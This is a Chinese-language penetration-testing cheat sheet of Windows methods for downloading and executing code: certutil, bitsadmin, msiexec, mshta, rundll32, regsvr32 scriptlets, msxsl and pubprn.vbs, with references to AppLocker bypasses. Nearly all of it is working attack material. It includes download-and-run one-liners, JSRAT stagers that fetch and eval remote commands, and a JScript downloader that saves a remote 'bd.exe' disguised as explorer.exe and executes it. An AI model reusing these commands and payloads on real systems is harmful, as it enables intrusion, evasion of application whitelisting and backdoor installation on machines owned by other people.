1、前言
在渗透或是病毒分析总是会遇到很多千奇百怪的下载文件和执行命令的方法。
2、实现方式
2.1、Powershell
win2003、winXP不支持
$client = new-object System.Net.WebClient
$client.DownloadFile(‘http://payloads.online/file.tar.gz’, ‘E:file.tar.gz’)
2.2、FTP
ftp 192.168.3.2
输入用户名和密码后
cd E:file # 进入E盘下的file目录
cd www # 进入服务器上的www目录
get access.log # 将服务器上的access.log下载到E:file
可以参考:https://baike.baidu.com/item/ftp/13839
2.3、IPC$
copy \192.168.3.1c$ est.exe E:file
2.4、Certutil
可以参考:https://technet.microsoft.com/zh-cn/library/cc773087(WS.10).aspx
应用到: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2
certutil.exe -urlcache -split -f http://192.168.3.1/test.txt file.txt
2.5、bitsadmin
可以参考:https://msdn.microsoft.com/en-us/library/aa362813(v=vs.85).aspx
1、bitsadmin /rawreturn /transfer getfile http://192.168.3.1/test.txt E:file est.txt
2、bitsadmin /rawreturn /transfer getpayload http://192.168.3.1/test.txt E:file est.txt
完整利用:
cmd.exe /c bitsadmin /transfer d90f http://site.com/a %APPDATA%d90f.exe&%APPDATA%d90f.exe&del %APPDATA%d90f.exe
2.6、msiexec
msiexec /q /i http://192.168.3.1/test.txt
use png
msiexec /q /i http://site.com/payloads/calc.png
calc.png
msfvenom -f msi -p windows/exec CMD=calc.exe > cacl.png
2.7、IEExec
需要执行两条命令,一条关闭.net安全策略,一条下载
C:WindowsMicrosoft.NETFrameworkv2.0.50727> caspol -s off
下载exe
C:WindowsMicrosoft.NETFrameworkv2.0.50727> IEExec http://192.168.3.1/test.exe
2.8、python
C:python27python.exe -c “import urllib2; exec urllib2.urlopen(‘http://192.168.3.1/test.zip’).read();”
2.9、mshta
mshta http://192.168.3.1/run.hta
run.hta 内容如下:
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "cmd.exe /c net user" // 这里填写命令
self.close
</script>
<body>
demo
</body>
</HEAD>
</HTML>
mshta是用来执行hta文件的,经过测试发现,其实没有hta文件,也可以通过mshta来执行命令的,经过几次测试发现mshta不仅可以使用vbscript,而且可以使用javascript来执行命令,整理payload如下:
VBSCRIPT EXEC
mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)
JAVASCRIPT EXEC
mshta javascript:"..mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}
JSRAT
mshta javascript:"..mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.2.101:9998/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}
2.10、rundll32
其实还是依赖于WScript.shell这个组件
默认方式
rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}%
Use SCT
regsvr32 /u /s /i:http://urlto/calc.sct scrobj.dll
calc.sct:
<?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{20001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- regsvr32 /s /i"C:BypassBackdoor.sct" scrobj.dll -->
<!-- regsvr32 /s /i:http://server/Backdoor.sct scrobj.dll -->
<!-- That should work over a proxy and SSL/TLS... -->
<!-- Proof Of Concept - Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
<public>
<method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
function Exec()
{
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
}
]]>
</script>
</scriptlet>
运行JSRAT:
regsvr32 /s /n /u /i:http://urlto/JSRAT.sct scrobj.dll
JSRAT.sct
<?XML version="1.0"?>
<scriptlet>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
rat="rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");try{v=w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet%20Settings\\ProxyServer");q=v.split("=")[1].split(";")[0];h.SetProxy(2,q);}catch(e){}h.Open("GET","http://127.0.0.1/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}";
new ActiveXObject("WScript.Shell").Run(rat,0,true);
]]>
</script>
</registration>
</scriptlet>
USE PNG
regsvr32 /u /s /i:http://site.com/js.png scrobj.dll
js.png
<?XML version="1.0"?>
<let>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
< language="J">
<![CDATA[
ps = "cmd.exe /c calc.exe";
new ActiveXObject("W.Shell").Run(ps,0,true);
]]>
</>
</registration>
</let>
Use WSC
运行计算器
rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();GetObject("script:http://urlto/calc.wsc")
calc.wsc
<?xml version="1.0"?>
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</component>
</package>
运行JSRAT
rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();GetObject("script:http://urlto/JSRAT.wsc")
JSRAT.wsc:
<?xml version="1.0"?>
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
rat="rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");try{v=w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet%20Settings\\ProxyServer");q=v.split("=")[1].split(";")[0];h.SetProxy(2,q);}catch(e){}h.Open("GET","http://127.0.0.1/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}";
new ActiveXObject("WScript.Shell").Run(rat,0,true);
]]>
</script>
</component>
</package>
2.11、regsvr32
regsvr32 /u /s /i:http://192.168.3.1/test.data scrobj.dll
test.data内容:
<?XML version="1.0"?>
<scriptlet>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
ps = "cmd.exe /c calc.exe";
new ActiveXObject("WScript.Shell").Run(ps,0,true);
]]>
</script>
</registration>
</scriptlet>
还可以利用 https://github.com/CroweCybersecurity/ps1encode 生成sct(COM scriptlet - requires a webserver to stage the payload)
regsvr32 /u /s /i:http://192.168.3.1/test.sct scrobj.dll
2.12、MSXSL.EXE
msxsl.exe是微软用于命令行下处理XSL的一个程序,所以通过他,我们可以执行JavaScript进而执行系统命令。
下载地址为:
Command Line Transformation Utility (msxsl.exe)
https://www.microsoft.com/en-us/download/details.aspx?id=21714
msxsl.exe 需要接受两个文件,XML及XSL文件,命令行操作如下:
msxsl.exe demo.xml exec.xsl
demo.xml
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="exec.xsl" ?>
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>
exec.xsl
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="JScript" implements-prefix="user">
function xml(nodelist) {
var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");
return nodelist.nextNode().xml;
}
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:xml(.)"/>
</xsl:template>
</xsl:stylesheet>
同样的,msxsl.exe可以远程加载,具体方式如下:
msxsl https://website.com/scripts/demo.xml https://website.com/scripts/exec.xsl
MSF生成MSI:
msfvenom -f msi -p windows/exec CMD=calc.exe > cacl.msi
命令行运行:
msiexec /quiet /i cacl.msi
将payload放在远程服务器上运行:
https://website.com/payloads/calc.png
2.13、JS下载者
<?XML version="1.0"?>
<scriptlet>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
var WSHShell = new ActiveXObject("WScript.Shell");
path = WSHShell.ExpandEnvironmentStrings("%temp%");
var filepath = path+"/explorer.exe";
var xhr = new ActiveXObject("MSXML2.XMLHTTP");
xhr.open("GET","http://x.x.x.x/bd.exe", false);
xhr.send();
if (xhr.Status == 200) {
var fso = new ActiveXObject("Scripting.FileSystemObject");
var stream = new ActiveXObject("ADODB.Stream");
stream.Open();
stream.Type = 1;
stream.Write(xhr.ResponseBody);
stream.Position = 0;
if (fso.FileExists(filepath)){
fso.DeleteFile(filepath);
}
stream.SaveToFile(filepath);
stream.Close();
new ActiveXObject("WScript.Shell").Exec(filepath);
}
]]>
</script>
</registration>
</scriptlet>
2.14、pubprn.vbs
在Windows 7以上版本存在一个名为PubPrn.vbs的微软已签名WSH脚本,其位于C:WindowsSystem32Printing_Admin_Scriptsen-US,仔细观察该脚本可以发现其显然是由用户提供输入(通过命令行参数),之后再将参数传递给GetObject()
"C:WindowsSystem32Printing_Admin_Scriptszh-CNpubprn.vbs" 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct
test.sct
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
</registration>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
3、参考
Bypass AppLocker With MSXSL.EXE
https://evi1cg.me/archives/AppLocker_Bypass_MSXSL.html
Windows下命令行下载文件总结
http://payloads.online/archivers/2017-11-08/1
Bypassing Applocker with msiexec
https://evi1cg.me/archives/Bypassing_Applocker_with_msiexec.html
Exec Commands Via Mshta.exe
https://evi1cg.me/archives/Exec_Commands_Via_Mshta.html
Exec Commands Via Mshta.exe
https://evi1cg.me/archives/Exec_Commands_Via_Mshta.html
JSRAT几种启动方式
https://evi1cg.me/archives/Run_JSRAT.html
windows命令执行漏洞不会玩? 看我!
http://www.sohu.com/a/199732200_99907709
WSH注入技巧分享
http://www.freebuf.com/articles/system/143957.html
Application Whitelist Bypass using IEexec.exe
https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/